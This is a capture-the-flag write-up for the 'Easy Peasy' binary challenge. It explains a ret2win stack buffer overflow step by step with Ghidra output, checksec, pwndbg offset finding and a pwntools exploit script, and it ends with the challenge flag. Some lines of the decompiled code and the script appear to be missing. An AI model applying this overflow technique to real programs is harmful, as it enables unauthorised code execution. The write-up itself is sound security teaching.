Tags: easy binary 


# Easy Peasy

## Description

> A super secret piece of information has been hidden behind a program made by 1337 hackers.
> Find this crucial piece of information
> Author: Anand Rajaram
> [`ezpz`](https://github.com/JOvenOven/ctf-writeups/blob/41d5cb83010eab06422f3673de257b646e0b3066/DeconstruCT.F/binary/easy_peasy/ezpz)

Tags: _binary_ \
Difficulty: _easy_ \
Points: _100_

## Solution

When executing the binary, the user is asked to insert a password

$ ./ezpz
Please enter the super secret password to display the flag:
Invalid password, try again

If we insert a large text, it throws a `Segmentation fault`, which means it is vulnerable to `buffer overflow` attacks.

$ ./ezpz
Please enter the super secret password to display the flag:
Segmentation fault


We can confirm that by opening the binary with a disassembler like `ghidra` in which we can see three important functions; `main`, `vuln`, and `win`

undefined8 main(void)

puts("Please enter the super secret password to display the flag:");
fflush((FILE *)stdout);
puts("Invalid password, try again\n");
return 0;

void vuln(void)

char local_28 [32];


void win(void)

char local_58 [72];
FILE *local_10;

local_10 = fopen64("flag.txt","r");
if (local_10 == (FILE *)0x0) {
printf("%s %s","Please create \'flag.txt\' in this directory with your","own debugging flag.\n")
/* WARNING: Subroutine does not return */

By watching this code we know that this is a classic `ret2win` challenge, where we have to overwrite the return address with a `buffer overflow` to execute the `win` function and get the flag.

It is also important to check the security posture of the binary by executing the command `checksec` to see what kind of vulnerabilities we can exploit.

$ checksec ezpz
Arch: amd64-64-little
Stack: Canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments

According to the output of `checksec`, the security of this binary appears to be weak. While the binary likely contains a `canary`, it's worth noting that the canary protection isn't present in the `vuln` function, which is the specific function we intend to exploit. This indicates that the initial conditions for the exploit are favorable.

The following steps are the recipe for solving `ret2win` challenges:

1. Determine the offset between the start of the user input and the return address in the stack.
2. Fill the stack with random data until it reaches the return address.
3. Overwrite the return address with a `ret` gadget. This gadget redirects the flow of execution to the address of the next function we specify after the gadget, creating a [`ROP chain`](https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/rop-chaining-return-oriented-programming). This step helps avoid potential stack alignment issues.
4. Incorporate the address of the `win` function into the payload.

To find the offset, I usually use `cyclic`, which is available in the `pwndbg` plug-in of the `GDB` debugger.

$ gdb ezpz
pwndbg> cyclic 100
pwndbg> run

Copy the 100-character string, then paste it when the program prompts for the password. It should crash trying to go to the specific memory address in `ret` (return address) `0x6161616161616166`. Use `cyclic -l <ret_addr>` again to get the exact offset where we will start overwriting the return address.

pwndbg> cyclic -l 0x6161616161616166
Finding cyclic pattern of 8 bytes: b'faaaaaaa' (hex: 0x6661616161616161)
Found at offset 40

I will use the Python library `pwntools` to execute the following steps. Note that the exploit is encapsulated inside the _"EXPLOIT GOES HERE"_ section. The remaining code serves as a template, where you should only change the remote connection parameters with the actual values of your instance.

from pwn import *

# Set up the target binary by specifying the ELF file
elf = context.binary = ELF("ezpz")

# Defining the GDB script that will be used when running the
# binary
gs = '''

# Launch the binary with GDB, without GDB or REMOTE based on
# the command-line arguments
def start():
if args.REMOTE:
return remote("", 31636)
if args.GDB:
return gdb.debug(elf.path, gdbscript=gs)
return process(elf.path)

io = start()


# Find a ret gadget
ret = asm('ret')
ret = next(elf.search(ret))

# ret address is a padding to avoid stack alignment issues and
# the main function allows the program to print the flag remotely
payload = b"A"*40 + p64(ret) + p64(elf.sym.win) + p64(elf.sym.main)

# Send the payload


# Interact with the process

In my script I added the `main` function at the end of the payload because it didn't work remotely without it. I am not pretty sure the reason for this behavior, but I guess it happens because the `win` function does not return properly, causing the process to finish before it can print the flag. When we add the `main` function to the payload, the execution proceeds as expected, resulting in the successful printing of the flag.

Flag `dsc{tH15_N3W_Fl4G_15_aW350M3!}`

Original writeup (https://github.com/JOvenOven/ctf-writeups/tree/main/DeconstruCT.F/binary/easy_peasy).